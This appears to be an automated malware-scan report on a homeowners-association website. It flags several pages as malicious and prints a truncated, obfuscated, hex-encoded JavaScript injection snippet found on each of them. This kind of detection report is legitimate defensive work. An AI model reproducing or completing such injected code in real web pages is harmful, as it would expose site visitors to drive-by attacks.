Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=goldenvalleypoa.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://goldenvalleypoa.com/ | 200 OK Content-Length: 17819 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) jhkcxp="s"+"p"+"li"+"t";jdzbo=window;spve="dy";dufuv=document;gdbhip="0x";bnlxc=(5-3-1);try{++(dufuv.body)}catch(mfhl){qwvs=false;try{}catch(qlpiik){qwvs=21;}if(1){nylbvm="17:5d:6c:65:5a:6b:60:66:65:17:70:5a:61:6b:68:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:70:5a:61:6b:68:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:6 Antivirus reports:
| ||
http://goldenvalleypoa.com/media/system/js/mootools-core.js | 200 OK Content-Length: 96362 Content-Type: application/javascript | clean |
http://goldenvalleypoa.com/media/system/js/core.js | 200 OK Content-Length: 4784 Content-Type: application/javascript | clean |
http://goldenvalleypoa.com/media/system/js/caption.js | 200 OK Content-Length: 729 Content-Type: application/javascript | clean |
http://goldenvalleypoa.com/media/system/js/mootools-more.js | 200 OK Content-Length: 238331 Content-Type: application/javascript | clean |
http://goldenvalleypoa.com/templates/beez_20/javascript/md_stylechanger.js | 200 OK Content-Length: 2104 Content-Type: application/javascript | clean |
http://goldenvalleypoa.com/templates/beez_20/javascript/hide.js | 200 OK Content-Length: 8145 Content-Type: application/javascript | clean |
http://goldenvalleypoa.com/index.php/component/users/?view=reset | 200 OK Content-Length: 19009 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) jhkcxp="s"+"p"+"li"+"t";jdzbo=window;spve="dy";dufuv=document;gdbhip="0x";bnlxc=(5-3-1);try{++(dufuv.body)}catch(mfhl){qwvs=false;try{}catch(qlpiik){qwvs=21;}if(1){nylbvm="17:5d:6c:65:5a:6b:60:66:65:17:70:5a:61:6b:68:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:70:5a:61:6b:68:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:6 Antivirus reports:
| ||
http://goldenvalleypoa.com/media/system/js/validate.js | 200 OK Content-Length: 2923 Content-Type: application/javascript | clean |
http://goldenvalleypoa.com/index.php/component/users/ | 200 OK Content-Length: 18830 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) jhkcxp="s"+"p"+"li"+"t";jdzbo=window;spve="dy";dufuv=document;gdbhip="0x";bnlxc=(5-3-1);try{++(dufuv.body)}catch(mfhl){qwvs=false;try{}catch(qlpiik){qwvs=21;}if(1){nylbvm="17:5d:6c:65:5a:6b:60:66:65:17:70:5a:61:6b:68:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:70:5a:61:6b:68:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:6 Antivirus reports:
| ||
http://goldenvalleypoa.com/index.php/component/users/?view=remind | 200 OK Content-Length: 18850 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) jhkcxp="s"+"p"+"li"+"t";jdzbo=window;spve="dy";dufuv=document;gdbhip="0x";bnlxc=(5-3-1);try{++(dufuv.body)}catch(mfhl){qwvs=false;try{}catch(qlpiik){qwvs=21;}if(1){nylbvm="17:5d:6c:65:5a:6b:60:66:65:17:70:5a:61:6b:68:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:70:5a:61:6b:68:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:6 Antivirus reports:
| ||
http://goldenvalleypoa.com/index.php/component/users/?view=registration | 200 OK Content-Length: 20867 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) jhkcxp="s"+"p"+"li"+"t";jdzbo=window;spve="dy";dufuv=document;gdbhip="0x";bnlxc=(5-3-1);try{++(dufuv.body)}catch(mfhl){qwvs=false;try{}catch(qlpiik){qwvs=21;}if(1){nylbvm="17:5d:6c:65:5a:6b:60:66:65:17:70:5a:61:6b:68:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:70:5a:61:6b:68:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:6 Antivirus reports:
| ||
http://goldenvalleypoa.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: goldenvalleypoa.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Mon, 13 Oct 2014 07:48:32 GMT
Pragma: no-cache
Server: Apache
Content-Length: 17819
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 7c8090c384820c29f94544edf8f11826=7877e2da2c1d9c5ed2c8425f608b33be; path=/
X-Powered-By: PHP/5.4.33
...17819 bytes of data.
GET / HTTP/1.1
Host: goldenvalleypoa.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Mon, 13 Oct 2014 07:48:32 GMT
Pragma: no-cache
Server: Apache
Content-Length: 17819
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 7c8090c384820c29f94544edf8f11826=7877e2da2c1d9c5ed2c8425f608b33be; path=/
X-Powered-By: PHP/5.4.33
...17819 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: goldenvalleypoa.com
Referer: http://www.google.com/search?q=goldenvalleypoa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: goldenvalleypoa.com
Referer: http://www.google.com/search?q=goldenvalleypoa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.